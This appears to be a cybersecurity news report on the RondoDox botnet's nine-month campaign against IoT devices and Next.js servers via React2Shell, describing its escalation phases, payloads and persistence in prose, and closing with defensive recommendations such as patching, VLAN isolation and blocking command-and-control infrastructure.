RondoDox Botnet IoT Attack Campaign
Cybersecurity analysts have uncovered a highly persistent campaign lasting approximately nine months that has actively targeted Internet of Things (IoT) devices and web applications. The objective of this operation has been to conscript vulnerable systems into a botnet dubbed RondoDox, demonstrating both patience and operational maturity on the part of the attackers.
Table of Contents
React2Shell: The Critical Entry Point
As of December 2025, researchers observed the campaign exploiting React2Shell (CVE-2025-55182) as its primary initial access mechanism. This critical vulnerability, carrying a CVSS score of 10.0, affects React Server Components (RSC) and Next.js implementations. When unpatched, it allows unauthenticated remote code execution, effectively granting attackers full control over exposed systems.
Exposure at Scale: Global Impact
Telemetry collected through late December 2025 indicates that roughly 90,300 vulnerable instances remain exposed worldwide. The majority are located in the United States, accounting for approximately 68,400 systems. Other significantly affected regions include Germany with about 4,300 instances, France with 2,800, and India with 1,500, underscoring the global reach of the issue.
RondoDox Evolves Its Exploit Arsenal
First identified in early 2025, RondoDox has steadily expanded its capabilities by incorporating additional N-day vulnerabilities into its exploitation toolkit. These include CVE-2023-1389 and CVE-2025-24893. Prior reporting had already warned of the botnet’s use of React2Shell, highlighting a trend of rapid weaponization of newly disclosed flaws.
Three Phases of Escalation
Before weaponizing CVE-2025-55182, the RondoDox campaign progressed through a structured escalation cycle:
March–April 2025: Focused reconnaissance paired with manual vulnerability discovery and testing.
April–June 2025: Daily, large-scale probing of common web platforms such as WordPress, Drupal, and Struts2, alongside IoT hardware, including Wavlink routers.
July–early December 2025: Fully automated, hourly deployment designed for maximum reach and persistence.
December Attacks: Payloads and Persistence
During the activity observed in December 2025, threat actors scanned for exposed Next.js servers and attempted to deploy multiple malicious components. These included cryptocurrency miners, a botnet loader and health-check utility, and a Mirai-based botnet variant tailored for x86 systems.
A key component, '/nuts/bolts,' plays a defensive role for the attackers. It systematically terminates competing malware and coin miners before retrieving the primary bot binary from its command-and-control (C2) infrastructure. One identified variant aggressively cleans infected hosts by removing traces of rival botnets, Docker-based payloads, remnants of earlier campaigns, and associated cron jobs, while simultaneously establishing persistence through modifications to /etc/crontab.
The malware further enforces exclusivity by continuously scanning the /proc filesystem to identify active executables, terminating any non-whitelisted processes roughly every 45 seconds. This behavior effectively blocks reinfection attempts by other threat actors.
Reducing Risk and Limiting Exposure
To counter the threat posed by RondoDox, security teams should adopt a layered defensive strategy:
- Promptly upgrade Next.js deployments to fully patched versions addressing CVE-2025-55182.
- Isolate IoT devices within dedicated VLANs to limit lateral movement.
- Implement Web Application Firewalls (WAFs) and continuously monitor for anomalous process execution.
- Proactively block known command-and-control infrastructure associated with the botnet.
Taken together, these measures significantly reduce the likelihood of compromise and help contain the impact of ongoing botnet activity.
